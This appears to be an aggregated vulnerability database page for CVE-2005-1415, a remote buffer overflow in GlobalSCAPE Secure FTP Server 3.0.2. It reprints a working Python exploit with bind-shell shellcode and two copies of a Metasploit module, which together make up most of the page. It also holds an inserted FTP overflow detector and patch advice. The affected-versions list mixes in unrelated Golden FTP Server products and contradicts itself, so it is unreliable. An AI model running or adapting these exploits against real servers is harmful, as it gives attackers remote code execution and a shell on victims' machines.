CVE-2005-1415
CVSS 10.0
Published: 2005-05-03 00:00:00
Revised: 2008-09-05 16:49:05

[Original] Buffer overflow in GlobalSCAPE Secure FTP Server 3.0.2 allows remote authenticated users to execute arbitrary code via a long FTP command.


[CNNVD] GlobalSCAPE Secure FTP Server Remote Overflow Vulnerability (CNNVD-200505-866)

        GlobalSCAPE Secure FTP Server is a flexible and reliable FTP server program.
        GlobalSCAPE Secure FTP Server has a remote buffer overflow vulnerability; a remote attacker can exploit it to execute arbitrary commands.

- CVSS (base score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: COMPLETE [complete information disclosure, exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause complete system outage]
Access complexity: LOW [no access restrictions on exploitation]
Access vector: [--]
Authentication: NONE [no authentication required for exploitation]

- CPE (affected platforms and products)

cpe:/a:globalscape:secure_ftp_server:3.0.2
cpe:/a:globalscape:secure_ftp_server:3.0

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1415
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1415
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-866
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/13454
(PATCH)  BID  13454
http://www.cuteftp.com/gsftps/history.asp
(PATCH)  CONFIRM  http://www.cuteftp.com/gsftps/history.asp
http://archives.neohapsis.com/archives/fulldisclosure/2005-04/0674.html
(UNKNOWN)  FULLDISC  20050501 Remote buffer overflow in GlobalScape Secure FTP server 3.0.2

- Vulnerability information

GlobalSCAPE Secure FTP Server Remote Overflow Vulnerability
Critical  Buffer overflow
2005-05-03 00:00:00 2005-10-20 00:00:00
Remote
        GlobalSCAPE Secure FTP Server is a flexible and reliable FTP server program.
        GlobalSCAPE Secure FTP Server has a remote buffer overflow vulnerability; a remote attacker can exploit it to execute arbitrary commands.

- Advisories and patches

        No data available

- Vulnerability information (975)

GlobalScape Secure FTP Server 3.0 Buffer Overflow Exploit (EDBID:975)
windows remote
2005-05-01 Verified
21 muts
#!/usr/bin/python
###############################################
# GlobalScape Secure FTP Server Buffer Overflow
# Coded by mati@see-security.com
# http://www.see-security.com
# http://www.hackingdefined.com/exploits/Globalscape30.pdf
###############################################
# EIP Overwrite
# root@[muts]# ./globalscape-3.0-ftp.py
#
# [+] Evil GlobalFTP 3.0 Secure Server Exploit
# [+] Coded by mati [at] see-security [dot] com
# [+] 220 GlobalSCAPE Secure FTP Server (v. 3.0) * UNREGISTERED COPY *
#
# [+] Sending Username
# [+] Sending Password
# [+] Sending evil buffer
# [+] Connect to port 4444 on victim Machine!
#
# root@[muts]# nc -v 192.168.1.153 4444
# [192.168.1.153] 4444 (?) open
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# C:\WINNT\system32>

import socket
import struct
import time

# win32_bind - EXITFUNC=thread LPORT=4444 Size=717 Encoder=PexAlphaNum 
# http://metasploit.com */

sc = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
sc +="\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
sc +="\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
sc +="\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
sc +="\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
sc +="\x4f\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58"
sc +="\x4e\x56\x46\x32\x46\x32\x4b\x38\x45\x44\x4e\x43\x4b\x58\x4e\x47"
sc +="\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x41\x4b\x58"
sc +="\x4f\x55\x42\x52\x41\x30\x4b\x4e\x43\x4e\x42\x53\x49\x54\x4b\x38"
sc +="\x46\x53\x4b\x58\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a"
sc +="\x46\x58\x42\x4c\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30"
sc +="\x44\x4c\x4b\x4e\x46\x4f\x4b\x33\x46\x55\x46\x42\x4a\x42\x45\x57"
sc +="\x43\x4e\x4b\x58\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x58"
sc +="\x4e\x50\x4b\x34\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x43\x30"
sc +="\x4e\x52\x4b\x48\x49\x38\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c"
sc +="\x41\x43\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x33\x4b\x58\x42\x44"
sc +="\x4e\x50\x4b\x38\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x42\x54\x4a\x50"
sc +="\x50\x35\x4a\x46\x50\x58\x50\x44\x50\x50\x4e\x4e\x42\x35\x4f\x4f"
sc +="\x48\x4d\x41\x53\x4b\x4d\x48\x36\x43\x55\x48\x56\x4a\x36\x43\x33"
sc +="\x44\x33\x4a\x56\x47\x47\x43\x47\x44\x33\x4f\x55\x46\x55\x4f\x4f"
sc +="\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x53\x42\x45\x4f\x4f"
sc +="\x48\x4d\x4f\x35\x49\x48\x45\x4e\x48\x56\x41\x48\x4d\x4e\x4a\x50"
sc +="\x44\x30\x45\x55\x4c\x46\x44\x50\x4f\x4f\x42\x4d\x4a\x36\x49\x4d"
sc +="\x49\x50\x45\x4f\x4d\x4a\x47\x55\x4f\x4f\x48\x4d\x43\x45\x43\x45"
sc +="\x43\x55\x43\x55\x43\x45\x43\x34\x43\x45\x43\x34\x43\x35\x4f\x4f"
sc +="\x42\x4d\x48\x56\x4a\x56\x41\x41\x4e\x35\x48\x36\x43\x35\x49\x38"
sc +="\x41\x4e\x45\x49\x4a\x46\x46\x4a\x4c\x51\x42\x57\x47\x4c\x47\x55"
sc +="\x4f\x4f\x48\x4d\x4c\x36\x42\x31\x41\x45\x45\x35\x4f\x4f\x42\x4d"
sc +="\x4a\x36\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x47\x55\x4f\x4f\x48\x4d"
sc +="\x43\x35\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x45\x4e\x49\x44\x48\x38"
sc +="\x49\x54\x47\x55\x4f\x4f\x48\x4d\x42\x55\x46\x35\x46\x45\x45\x35"
sc +="\x4f\x4f\x42\x4d\x43\x49\x4a\x56\x47\x4e\x49\x37\x48\x4c\x49\x37"
sc +="\x47\x45\x4f\x4f\x48\x4d\x45\x55\x4f\x4f\x42\x4d\x48\x36\x4c\x56"
sc +="\x46\x46\x48\x36\x4a\x46\x43\x56\x4d\x56\x49\x38\x45\x4e\x4c\x56"
sc +="\x42\x55\x49\x55\x49\x52\x4e\x4c\x49\x48\x47\x4e\x4c\x36\x46\x54"
sc +="\x49\x58\x44\x4e\x41\x43\x42\x4c\x43\x4f\x4c\x4a\x50\x4f\x44\x54"
sc +="\x4d\x32\x50\x4f\x44\x54\x4e\x52\x43\x49\x4d\x58\x4c\x47\x4a\x53"
sc +="\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46\x44\x57\x50\x4f\x43\x4b\x48\x51"
sc +="\x4f\x4f\x45\x57\x46\x54\x4f\x4f\x48\x4d\x4b\x45\x47\x35\x44\x35"
sc +="\x41\x35\x41\x55\x41\x35\x4c\x46\x41\x50\x41\x35\x41\x45\x45\x35"
sc +="\x41\x45\x4f\x4f\x42\x4d\x4a\x56\x4d\x4a\x49\x4d\x45\x30\x50\x4c"
sc +="\x43\x35\x4f\x4f\x48\x4d\x4c\x56\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f"
sc +="\x42\x4d\x4b\x58\x47\x45\x4e\x4f\x43\x38\x46\x4c\x46\x36\x4f\x4f"
sc +="\x48\x4d\x44\x55\x4f\x4f\x42\x4d\x4a\x36\x4f\x4e\x50\x4c\x42\x4e"
sc +="\x42\x36\x43\x55\x4f\x4f\x48\x4d\x4f\x4f\x42\x4d\x5a"

buffer = '\x41'*2043+ struct.pack("<L",0x7C4FEDBB)+'\x90'*36+sc
try:
	s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	print "\n[+] Evil GlobalFTP 3.0 Secure Server Exploit"
	print "[+] Coded by muts"
	connect=s.connect(('192.168.1.153',21))
	d=s.recv(1024)
	print "[+] " +d
	print "[+] Sending Username"
	time.sleep(1)
	s.send('USER muts\r\n')
	s.recv(1024)
	print "[+] Sending Password"
	time.sleep(1)
	s.send('PASS muts\r\n')
	s.recv(1024)
	print "[+] Sending evil buffer"
	time.sleep(1)
	s.send(buffer+'r\n')
	print "[+] Connect to port 4444 on victim Machine!\n"
except:
	print "Can't connect to ftp"

# milw0rm.com [2005-05-01]
		

- Vulnerability information (16703)

GlobalSCAPE Secure FTP Server Input Overflow (EDBID:16703)
windows remote
2010-10-05 Verified
0 metasploit
##
# $Id: globalscapeftp_input.rb 10559 2010-10-05 23:41:17Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::Ftp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'GlobalSCAPE Secure FTP Server Input Overflow',
			'Description'    => %q{
					This module exploits a buffer overflow in the GlobalSCAPE Secure FTP Server.
				All versions prior to 3.0.3 are affected by this flaw. A valid user account (
				or anonymous access) is required for this exploit to work.
			},
			'Author'         => [ 'Fairuzan Roslan <riaf [at] mysec.org>', 'Mati Aharoni <mati [at] see-security.com>' ],
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision: 10559 $',
			'References'     =>
				[
					[ 'CVE', '2005-1415'],
					[ 'OSVDB', '16049'],
					[ 'BID', '13454'],
					[ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2005-04/0674.html'],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 1000,
					'BadChars' => "\x00\x20" + (0x61..0x7a).to_a.pack('C*'),
					'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
				},
			'Platform'       => [ 'win' ],
			'Targets'        =>
				[
					[
						'GlobalSCAPE Secure FTP Server <= 3.0.2 Universal',
						{
							'Ret'      => 0x1002f01f,
						},
					],
				],
			'DisclosureDate' => 'May 1 2005',
			'DefaultTarget' => 0))
	end

	def exploit
		connect_login

		buf           = make_nops(3047)
		buf[2043, 4]  = [ target.ret ].pack('V')
		buf[2047, payload.encoded.length] = payload.encoded

		send_cmd( [buf] )

		handler
		disconnect
	end

end
		

- Vulnerability information (F82955)

GlobalSCAPE Secure FTP Server Input Overflow (PacketStormID:F82955)
2009-11-26 00:00:00
Mati Aharoni,riaf  metasploit.com
exploit,overflow
CVE-2005-1415

This Metasploit module exploits a buffer overflow in the GlobalSCAPE Secure FTP Server. All versions prior to 3.0.3 are affected by this flaw. A valid user account ( or anonymous access) is required for this exploit to work.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Ftp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'GlobalSCAPE Secure FTP Server Input Overflow',
			'Description'    => %q{
				This module exploits a buffer overflow in the GlobalSCAPE Secure FTP Server. 
				All versions prior to 3.0.3 are affected by this flaw. A valid user account (
				or anonymous access) is required for this exploit to work.		
			},
			'Author'         => [ 'Fairuzan Roslan <riaf [at] mysec.org>', 'Mati Aharoni <mati [at] see-security.com>' ],
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2005-1415'],
					[ 'OSVDB', '16049'],
					[ 'BID', '13454'],
					[ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2005-04/0674.html'],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 1000,
					'BadChars' => "\x00\x20\x61\x62\x63\x64\x65\x66\x67\x68\x69" +
					              "\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74" +
					              "\x75\x76\x77\x78\x79\x7a",
					'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",

				},
			'Targets'        => 
				[
					[
						'GlobalSCAPE Secure FTP Server <= 3.0.2 Universal',
						{
							'Platform' => 'win',
							'Ret'      => 0x1002f01f,
						},
					],
				],
			'DisclosureDate' => 'May 1 2005',
			'DefaultTarget' => 0))
	end

	def exploit
		connect_login

		buf           = make_nops(3047)
		buf[2043, 4]  = [ target.ret ].pack('V')
		buf[2047, payload.encoded.length] = payload.encoded
		
		send_cmd( [buf] )
		
		handler
		disconnect
	end

end
    

- Vulnerability information

16049
GlobalSCAPE Secure FTP Server (gsftps) Command Parsing Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public Vendor Verified

- Vulnerability description

A remote overflow exists in GlobalSCAPE Secure FTP Server. The Secure FTP Server fails to perform adequate bounds checking of user-supplied input resulting in a buffer overflow. With a specially crafted request in the format "[3000 Bytes] \r\n" , an attacker can overwrite the EIP and SEH registers and execute arbitrary code on the system, resulting in a loss of integrity.
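The description above gives defenders one concrete signal: the malicious request is a single FTP command line of roughly 3000 bytes, which no normal client sends. The following is an added example (not code from this page, from the vendor, or from any of the exploit authors) of a detection check that a protocol-aware proxy or IDS could run over captured FTP control-channel lines. It assumes lines are delivered one at a time with their CRLF terminator; the 512-byte alert threshold, the repeated-byte heuristic and the sample session are constructed for the example. The check generalises beyond this one product: it flags any over-long or filler-shaped command regardless of verb.

```python
"""Flag over-long FTP control-channel commands as a detection check.

Added example, not part of the original page or any vendor/project code.
Assumes FTP control-channel lines (with their trailing CRLF) are handed
to check_command() one at a time, e.g. by an IDS or a protocol-aware
proxy. The 3000-byte figure comes from the OSVDB description on this
page; the threshold and the sample session below are constructed.
"""
import re
from typing import List, Optional, Tuple

# Legitimate FTP command lines are short (a verb plus a path or a
# username). Assumed alert threshold; tune it to the deployment.
MAX_COMMAND_LEN = 512

# An FTP verb of 3-4 letters, an optional argument, and a CRLF terminator.
_CMD_RE = re.compile(rb"^([A-Za-z]{3,4})(?: (.*))?\r\n$", re.DOTALL)


def check_command(line: bytes, limit: int = MAX_COMMAND_LEN) -> Optional[str]:
    """Return a reason string if the line looks like an overflow attempt, else None."""
    if len(line) > limit:
        verb = line[:4].decode("ascii", "replace").strip()
        return f"command line of {len(line)} bytes exceeds limit {limit} (verb {verb!r})"
    m = _CMD_RE.match(line)
    if m is None:
        return "malformed command line (no CRLF terminator or unknown verb)"
    arg = m.group(2) or b""
    # A long run of one or two repeated byte values is the classic overflow
    # filler; real arguments (paths, usernames) have far more variety.
    if len(arg) >= 64 and len(set(arg)) <= 2:
        return f"argument is a {len(arg)}-byte run of repeated bytes"
    return None


def scan(lines: List[bytes]) -> List[Tuple[int, str]]:
    """Return (index, reason) for every suspicious line in a session."""
    findings = []
    for i, line in enumerate(lines):
        reason = check_command(line)
        if reason:
            findings.append((i, reason))
    return findings


# Constructed sample session: an ordinary login and two commands, then a
# 3000-byte line shaped like the request described on this page.
SAMPLE_SESSION = [
    b"USER alice\r\n",
    b"PASS s3cret\r\n",
    b"PWD\r\n",
    b"CWD /pub/incoming\r\n",
    b"A" * 3000 + b"\r\n",
]

if __name__ == "__main__":
    for idx, reason in scan(SAMPLE_SESSION):
        print(f"line {idx}: {reason}")
```

Only the last line of the sample session is reported; the length check fires before the regex is consulted, so a 3000-byte line is flagged even though it carries no recognisable verb. The repeated-byte heuristic catches shorter filler that stays under the length limit, at the cost of occasional false positives on unusual but legitimate arguments, which is why both the limit and the 64-byte run length are exposed as tunable values.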

- Timeline

2005-05-01 Unknown
2005-05-01 Unknown

- Solution

Upgrade to version 3.0.3 Build 4.29.2005 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Vulnerability author

- Vulnerability information

GlobalSCAPE Secure FTP Server Remote Buffer Overflow Vulnerability
Boundary Condition Error 13454
Yes No
2005-05-02 12:00:00 2009-11-26 09:45:00
"muts" <muts@whitehat.co.il> disclosed this vulnerability.

- Affected program versions

KMiNT21 Software Golden FTP Server 2.0 2b
KMiNT21 Software Golden FTP Server 1.31 b
KMiNT21 Software Golden FTP Server 1.30 b
KMiNT21 Software Golden FTP Server 1.20 b
KMiNT21 Software Golden FTP Server 1.0 0b
globalSCAPE Secure FTP Server 3.0.2 Build 04.12.2005.1
globalSCAPE Secure FTP Server 3.0
KMiNT21 Software Golden FTP Server 2.0 5b

- Unaffected program versions

KMiNT21 Software Golden FTP Server 2.0 5b

- Vulnerability discussion

GlobalSCAPE Secure FTP Server is prone to a remote buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer.

Exploiting this issue allows remote attackers to execute arbitrary machine code in the context of the vulnerable server.

- Exploitation

Proof-of-concept exploits have been provided by <mati@see-security.com>.

Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

A Metasploit exploit module is available.

- Solution

This issue is addressed in Secure FTP Server 3.0.3.


globalSCAPE Secure FTP Server 3.0

globalSCAPE Secure FTP Server 3.0.2 Build 04.12.2005.1

- References